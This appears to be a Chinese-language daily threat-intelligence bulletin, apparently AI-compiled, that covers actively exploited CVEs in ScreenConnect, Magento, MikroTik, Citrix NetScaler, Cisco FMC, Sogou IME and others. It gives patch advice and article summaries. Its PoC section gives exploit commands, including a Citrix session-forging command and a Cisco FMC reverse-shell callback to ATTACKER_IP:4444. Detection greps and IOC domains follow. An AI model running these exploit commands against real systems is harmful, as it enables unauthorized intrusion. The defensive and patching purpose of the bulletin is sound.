每日安全情报报告 · 2026-09-14
每日安全情报报告 · 2026-09-14
由 AI 整理发布
覆盖范围:2026-09-12 至 2026-09-14(优先收录近 24–48 小时新增/在野利用漏洞,并保留仍处处置窗口的在野存量)
风险等级图例:【严重】(CVSS 9.0–10.0) | 【高危】(CVSS 7.0–8.9) | 【中危】(CVSS 4.0–6.9)
标记说明:在野利用= 已确认被真实攻击使用(CISA KEV / 厂商/威胁情报证实)
一、最新高危漏洞
1. CVE-2026-84869 — ConnectWise ScreenConnect 客户端会话内任意文件执行【严重 · 在野利用】
- 漏洞编号:CVE-2026-84869
- 漏洞类型:权限管理缺陷 / 授权缺失(CWE-269/862),活跃远程会话内文件传输可绕过 Host 端确认直接执行
- 受影响组件:ConnectWise ScreenConnect 客户端(< 26.6.5);服务器不受影响,受打的是装在终端上的客户端
- CVSS 评分:9.9(Critical)
- 利用状态:CISA 于 2026-09-12(网传 09-10/11 批次)将其与 JFrog、MikroTik 共五漏洞一并纳入 KEV,联邦截止 09-14(今日)。Huntress 已记录 3 起事件:攻击者借被控 ScreenConnect 客户端推送恶意 VBScript 载荷,并呈蠕虫式向新连接终端扩散。连接一台被感染机器的运维自身也会中招。
- 修复版本:升级客户端至 26.6.5;临时缓解:进入 Administration → Security → Roles,逐项取消 TransferFiles 权限(不能替代升级)。
- 参考链接:NVD 详情 | CISA KEV 目录 | ThreatAft 技术分析 | The Hacker News KEV 报道
2. CVE-2026-75650 — Adobe Commerce / Magento "StyleSmuggler" 未授权 RCE【严重 · 在野利用】
- 漏洞编号:CVE-2026-75650(Adobe 公告 APSB26-146,热补丁 VULN-39341;代号 StyleSmuggler)
- 漏洞类型:模板引擎特殊元素中和不当(CWE-1336)→ 未认证远程代码执行(对象注入 + 文件包含)
- 受影响组件:Adobe Commerce 2.4.4–2.4.9(-2026-aug 及更早全系)、Adobe Commerce B2B 1.3.3–1.5.3、Magento Open Source 2.4.6–2.4.9;即已打 2026-08 月度补丁仍受影响
- CVSS 评分:10.0(Adobe 官方,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)/ NVD 口径 9.8
- 利用状态:Sansec 命名 StyleSmuggler,自 2026-09-04 起确认在野利用,9-7 Adobe 才发最高优先级热补丁(间隔 3 天)。攻击链:畸形输入"投毒"进日志/错误报告 → 触发"支付交易失败提醒"邮件 → 模板过滤器的对象注入链驱动 DI 组件包含执行污染文件 → RCE。后置载荷为 Rust Linux 后门(伪装 fc-cache/chronyd,C2 伪造成 NTP UDP/123 流量)或 PHP WebShell。CISA 已于 09-08 纳入 KEV(截止 09-11,且要求强制取证)。
- 修复版本:应用 Adobe 官方热补丁 VULN-39341(composer 补丁),且必须轮换加密主密钥及所有凭据(Adobe 强制要求);2.4.0–2.4.3 等 EOL 版本用 Scandiweb 回移补丁(未经 Adobe 验证,需 staging 验证)。
- 参考链接:Adobe 安全公告 APSB26-146 | NVD 详情 | Shield53 技术分析 | CISA KEV 目录
3. CVE-2026-67277 / CVE-2026-86060 — MikroTik RouterOS "MikroTrick" 未认证接管【严重 · 在野利用】
- 漏洞编号:CVE-2026-67277(关键功能缺失认证)+ CVE-2026-86060(命令参数分隔符未中性化)
- 漏洞类型:Missing Authentication for Critical Function(CWE-306)/ Improper Neutralization of Argument Delimiters(CWE-88)
- 受影响组件:MikroTik RouterOS(经互联网暴露的 SSH 管理接口)
- CVSS 评分:CISA 均标记 Critical(各来源口径约 CVSS 8.8 / 9.8,关联利用链名 "MikroTrick")
- 利用状态:CERT Polska 记录攻击者自 2026-09-02 起经暴露 SSH 无认证接管路由器;CISA 于 09-10 纳入 KEV,RouterOS 联邦截止 09-13(昨日到期)。两漏洞链式可实现完全管理员接管。
- 修复版本:升级至 MikroTik 官方修复版 RouterOS,并核查部署后是否存在未授权配置变更。
- 参考链接:NVD 详情 CVE-2026-67277 | NVD 详情 CVE-2026-86060 | CyberRecaps 9/13 KEV 报道 | CISA KEV 目录
4. CVE-2026-42016 / CVE-2026-42018 — JFrog Artifactory 链式提权(与 CVE-2026-82329 组合)【高危 · 在野利用】
- 漏洞编号:CVE-2026-42016(CVSS 8.1,令牌作用域被忽略的错误授权)+ CVE-2026-42018(CVSS 7.5,匿名令牌泄漏)+ 既有 CVE-2026-82329(CVSS 9.8,不当认证)
- 漏洞类型:Incorrect Authorization / Improper Authentication → 链式获取管理员控制权
- 受影响组件:自托管 JFrog Artifactory(< 7.133.11)
- CVSS 评分:8.1 + 7.5 + 9.8
- 利用状态:CISA 09-12 将 JFrog 两漏洞纳入 KEV(联邦截止 09-25)。攻击者将 CVE-2026-42016/42018 与 CVE-2026-82329 链式利用,夺取自托管实例管理员权限、创建持久账户、部署 Groovy 插件并安装 Rust 后门。Artifactory 沦陷意味着软件供应链投毒风险。
- 修复版本:升级至 7.133.11 或更高;轮换令牌、审计管理员账户、排查异常 Groovy 插件与出站连接。
- 参考链接:NVD 详情 CVE-2026-42016 | NVD 详情 CVE-2026-42018 | NVD 详情 CVE-2026-82329 | NetSecOps KEV 报道
5. CVE-2026-19490 — Citrix NetScaler ADC/Gateway SAML 认证绕过(会话伪造)【严重 · 在野利用】
- 漏洞编号:CVE-2026-19490(关联 CVE-2026-19489,CVSS 8.8 内存溢出)
- 漏洞类型:认证绕过(CWE-288,备用路径)→ 未签名 SAML 断言被接受,伪造有效会话
- 受影响组件:NetScaler ADC / Gateway 14.1 < 14.1-73.32、13.1 < 13.1-63.21(及对应 FIPS/NDcPP),配置为 Gateway(SSL VPN/ICA Proxy/CVPN/RDP Proxy)或 AAA vserver 且绑定 SAML action
- CVSS 评分:9.3(CVSS v4.0 Critical)
- 利用状态:Citrix 公告 CTX696939(2026-08-19)。CISA 于 09-09 纳入 KEV(联邦截止 09-12);公开 PoC 出现后,自 2026-09-04 起确认遭在野利用(无认证、无交互、低复杂度)。根因:
nsppe引擎在 SAML HTTP-Redirect binding 路径以strict=0调用解析器,且未签名断言门控将默认配置字(rejectUnsignedAssertion=ON)误判为"允许"。 - 修复版本:升级至 14.1-73.32 / 13.1-63.21(或对应 FIPS/NDcPP 修复版);无官方 workaround。
- 参考链接:Citrix 安全公告 CTX696939 | NVD 详情 | AiCybr KEV 与修复构建 | CISA KEV 目录
6. CVE-2026-85880 / CVE-2026-81963 — 微软 9 月补丁日两枚在野零日提权【高危 · 在野利用】
- 漏洞编号:CVE-2026-85880(Windows ALPC 堆溢出)+ CVE-2026-81963(Windows Update Stack 链接解析不当)
- 漏洞类型:本地权限提升(低权限/沙箱 → SYSTEM);CWE-122 / CWE-59
- 受影响组件:Windows 10/11 各版本、Windows Server 2012–2025(CVE-2026-85880 覆盖 10/2012–2022;CVE-2026-81963 覆盖 11 23H2+ 与 Server 2025)
- CVSS 评分:均 7.8(High)
- 利用状态:微软 2026-09-08 创纪录补丁日一次性修复 974 个 CVE(113+ 严重、约 20 个蠕虫型)。两枚零日均已被实战利用,CISA 于 09-08 纳入 KEV,联邦截止 09-22。CVE-2026-85880 可由低权限 AppContainer 逃逸沙箱提权至 SYSTEM(Volexity/Proofpoint 回报);CVE-2026-81963 为 2022 年以来首个被实战利用的 Windows Update Stack 提权。同时重点关注同批蠕虫型 DNS 服务 RCE CVE-2026-69730(9.8) 与远程桌面服务 RCE CVE-2026-69525(9.8)。
- 修复版本:安装 2026-09 累积更新(按域控 → 互联网可达服务器 Exchange/SharePoint → 成员服务器推进)。
- 参考链接:MSRC CVE-2026-85880 | MSRC CVE-2026-81963 | The CyberSignal 补丁日全景 | CISA KEV 目录
7. CVE-2026-51990 — 腾讯搜狗输入法一键 RCE → GrayRabbit 后门【严重 · 在野利用】
- 漏洞编号:CVE-2026-51990
- 漏洞类型:自定义
sgbiz:协议处理程序参数未校验 + 内嵌 Chromium 80 引擎沙箱关闭/同源策略禁用 → 单次点击远程代码执行 - 受影响组件:Windows 版搜狗输入法(< 16.3.0.3498);利用链借 CVE-2021-38003(陈旧 V8 漏洞,因引擎停留在 Chromium 80 仍未修复)
- CVSS 评分:严重级(具体 CVSS 厂商未单独公布;Gen Digital 评级 Critical)
- 利用状态:中国关联 APT UNC3569 利用该漏洞经一次点击部署 GRAYRABBIT 后门(远程命令 Shell、双向文件传输、反射加载模块,C2 走 443 端口 RC4 混淆原始 TCP)。公开 PoC 已于 2026-09-11 出现在 GitHub,BleepingComputer 于 09-13 确认仍在野利用。腾讯 04-21 推送 16.3.0.3498 修复(仅封堵入口,内嵌浏览器仍无沙箱,存在残余风险)。
- 修复版本:升级搜狗输入法至 16.3.0.3498 或更高;高安全终端建议用组策略限制
biz_helper.exe执行。 - 参考链接:ThreatCluster UNC3569 分析 | BugsToday 攻击链剖析 | NVD 详情
8. 其他在野存量速览(仍处处置窗口,持续利用中)
| 漏洞编号 | 类型 | 受影响组件 | CVSS | 在野状态 |
|---|---|---|---|---|
| CVE-2025-25249 | FortiOS 堆溢出 RCE(PivotC2 RAT) | Fortinet FortiOS/FortiSwitchManager/FortiSASE | 7.3 | KEV 09-09,截止 09-12 |
| CVE-2026-20079 | Cisco FMC 认证绕过→root(Qilin 勒索) | Cisco Secure FMC | 10.0 | KEV 09-09,截止 09-12 |
| CVE-2026-85706 | GitLab 路径遍历任意文件读 | GitLab CE/EE | 10.0 | KEV 09-11,截止 09-14(今日) |
| CVE-2026-87491 | Chrome V8 越界写 | Google Chromium | 8.8 | KEV 09-09 |
| CVE-2026-81578/82078 | PaperCut 认证绕过+动态类加载 RCE(AI Agent 规模化利用) | PaperCut NG/MF | 9.8/9.1 | 在野 |
二、最新漏洞 PoC(含复现步骤)
说明:以下 PoC 均为近期公开仓库,仅供授权安全研究与渗透测试使用。请严格遵守法律与授权边界;对企业资产务必在授权范围内操作。
1. CVE-2026-75650 — Adobe Commerce/Magento "StyleSmuggler"【在野 · 有公开 PoC】
- 公开 PoC:fortbridge/StyleSmuggler(HTTP 版未认证复现,Python 标准库即可) | dinosn 版 PoC(Sploitus)
- 复现步骤(需先自建 Magento Open Source 2.4.9 实验室):
bash git clone https://github.com/fortbridge/StyleSmuggler.git cd StyleSmuggler # 对本地实验室发起未认证序列:投毒错误报告 → 触发支付失败邮件渲染 → RCE python3 exploit.py --target http://localhost:18082 # 输出需包含 "RCE VERIFIED" 与当次运行生成的 canary 标记方为成功 - 前置条件:仅限自有/授权实验室;真实安装请用只读校验器或 disposable staging 克隆验证,切勿将探针置于生产 web 根目录。
2. CVE-2026-19490 — Citrix NetScaler SAML 认证绕过(会话伪造)【在野 · 有公开 PoC】
- 公开 PoC:TarPeg007/CVE-2026-19490(836 行单文件 Python,含 Docker 实验室)
- 复现步骤:
bash git clone https://github.com/TarPeg007/CVE-2026-19490.git cd CVE-2026-19490 # ① 非侵入配置探针:发送错误 issuer 的未签名断言 # 返回 "Malformed Assertion" → 非易感(STRICT);返回 issuer/policy 错误 → 默认配置易感 python3 poc.py https://vpn.target.com --check-only python3 poc.py https://vpn.target.com --safe-oracle # ② 完整利用(仅限授权目标):伪造指定 NameID 的会话 python3 poc.py https://vpn.target.com --mint --name-id someone@target.example - 前置条件:目标需配置为 Gateway/AAA vserver 且绑定 SAML action;成功判据为 302 跳转
/vpn/且NSC_AAAC/NSC_TASS为真实会话 cookie(注意区分删除标记 cookie)。
3. CVE-2026-20079 — Cisco Secure FMC 认证绕过 → Root RCE【在野 · 有公开 PoC】
- 公开 PoC:CyberAuth/CVE-2026-20079(Python 复现,含指纹/检查/利用/验证/清理模式)
- 复现步骤:
bash git clone https://github.com/CyberAuth/CVE-2026-20079.git cd CVE-2026-20079 python3 -m venv .venv && source .venv/bin/activate # Windows: .venv\Scripts\activate python3 -m pip install -r requirements.txt python3 CVE-2026-20079.py --target https://TARGET --check # 仅指纹/检查(无危害) python3 CVE-2026-20079.py --target https://TARGET --exploit \ --callback-host ATTACKER_IP --callback-port 4444 --auto-verify # 利用 - 前置条件:目标为受影响 Cisco Secure FMC 版本且存在 boot 阶段创建的
csm_processes会话;目标需有nc/netcat/ncat且可 outbound 至 callback 地址。
4. CVE-2026-51990 — 搜狗输入法 "sgbiz:" 一键 RCE(公开 PoC 已现)【在野 · 有公开 PoC】
- 公开 PoC:公开利用代码已于 2026-09-11 出现在 GitHub(ThreatCluster 攻击链分析 含完整链与 IOC);本项重点给出排查而非武器化复现。
- 攻击链(单次点击):
受害者点击恶意 sgbiz: 链接 → Windows 调起 biz_helper.exe(未校验参数) → 启动 SGMyInput.exe 打开"皮肤商店"并加载攻击者控制的 URL → 内嵌 Chromium 80(无沙箱、关同源策略)触发 CVE-2021-38003 → 代码执行 → 7-Zip DLL 侧加载 → 落地 GRAYRABBIT 后门 - 授权排查命令(端点侧只读检测):
bash # ① 监控 7z.exe 从非标准目录加载 7z.dll # (如 C:\Users\Public\Documents 下出现 7z.exe / 7z.dll / 名为 p 的文件 → 高度可疑) # ② 排查 NTFS 备用数据流(ADS)写入 streams.exe -s C:\Users\Public\Documents # ③ 网络侧:443 端口非 TLS(无 TLS ClientHello)出向流量 # 及对 mail.uaiubifas[.]top、noht1ng[.]top 的 DNS 解析回溯 - 前置条件:目标为未升级(< 16.3.0.3498)的 Windows 版搜狗输入法;补丁仅封堵入口,内嵌浏览器仍无沙箱,需结合行为监控。
5. CVE-2026-85706 — GitLab 路径遍历(暂无武器化 PoC,附检测命令)【在野 · 仅检测】
- 截至本报告发布,GitLab 路径遍历(CVE-2026-85706)尚无公开武器化 PoC;watchTowr 已观测到活跃探测。建议以升级 + 日志排查为主:
bash grep -R "repository/commits" /var/log/gitlab/ \ | grep -E '\.\./|/etc/|/proc/|passwd|gitlab\.rb' # 命中即疑似利用尝试 - 参考:NVD 详情 | CISA KEV
三、网络安全最新文章(标题 · 摘要 · 链接)
-
CISA Adds Artifactory, ScreenConnect & RouterOS Flaws to KEV — Daily Cybersecurity News (Sep 13) — CyberRecaps(2026-09-13)。汇总 CISA 09-12 五漏洞 KEV 批次(JFrog CVE-2026-42016/42018、ScreenConnect CVE-2026-84869、MikroTik CVE-2026-67277/86060)的利用现状与修复期限,并提示荷兰 NCSC 警告 Check Point VPN 两漏洞(CVE-2026-85102/85103)利用"迫在眉睫"。
-
Five Flaws Added to KEV in One Entry (09/13/2026) — The Axe Report(2026-09-13)。解读本批 KEV 的共性信号:制品仓库、远程支持工具、路由器操作系统均处于"他人工作之下"的基础设施层;另述微软披露的 passkey 主题钓鱼云账户接管与 Sogou CVE-2026-51990(GrayRabbit)活动。
-
Microsoft September 2026 Patch Tuesday: Record 974 CVEs, Two Zero-Days — The CyberSignal(2026-09-08 持续更新)。剖析创纪录单月补丁日,聚焦两枚在野零日 CVE-2026-85880 / CVE-2026-81963(KEV 截止 09-22),并提示 Defender 对旧零日 ShieldBreak(CVE-2026-69414)的修复已被新 PoC "ShieldCrash" 公开绕过。
-
ConnectWise ScreenConnect CVE-2026-84869 — CVSS 9.9 RCE, CISA KEV — ThreatAft(2026-09)。详述 ScreenConnect 客户端会话内文件传输绕过授权直接执行的机制、Huntress 观测到的 VBScript 蠕虫式传播,以及临时取消 TransferFiles 权限的缓解措施。
-
Sogou Input Method Turned One Link Into a Windows Backdoor — BugsToday(2026-09)。拆解 UNC3569 借
sgbiz:协议 + Chromium 80 无沙箱三处缺陷实现一键 RCE 并落地 GRAYRABBIT 的完整攻击链与反沙箱/ADS 自清除对抗设计。 -
CVSS 10.0 Magento Zero-Day Actively Exploited: Shield53 Analysis of CVE-2026-75650 — Shield53(2026-09)。分析 StyleSmuggler 的武器化速度(首例确认利用后约 50 分钟即被攻陷)、Rust 后门与 PHP WebShell 特征,以及"即已打 8 月补丁仍受影响"的关键风险点。
-
4 AI Security Stories (Sep 13): .git config Exploit in Claude Code/Codex, PaperCut AI-Agent Breach — Pondero(2026-09-13)。报道 Accomplish 披露的恶意
.git/config可让 Claude Code、OpenAI Codex、Cursor 静默拉取并执行攻击者代码(无需开发者打开文件);以及俄语背景攻击者用数百 AI Agent 规模化攻陷 440 个 PaperCut 实例(395 家组织)。 -
China-Linked UNC3569 Exploits Sogou Input Method Flaw to Deploy GrayRabbit — ThreatCluster(2026-09-13)。给出 CVE-2026-51990 的时间线、GRAYRABBIT 的 IOC(C2 域名、暂存服务器 IP、DLL/载荷哈希)与"补丁仅封堵入口、内嵌浏览器仍无沙箱"的残余风险评估。
部分内容由 AI 辅助生成
openEuler 是由开放原子开源基金会孵化的全场景开源操作系统项目,面向数字基础设施四大核心场景(服务器、云计算、边缘计算、嵌入式),全面支持 ARM、x86、RISC-V、loongArch、PowerPC、SW-64 等多样性计算架构
更多推荐


所有评论(0)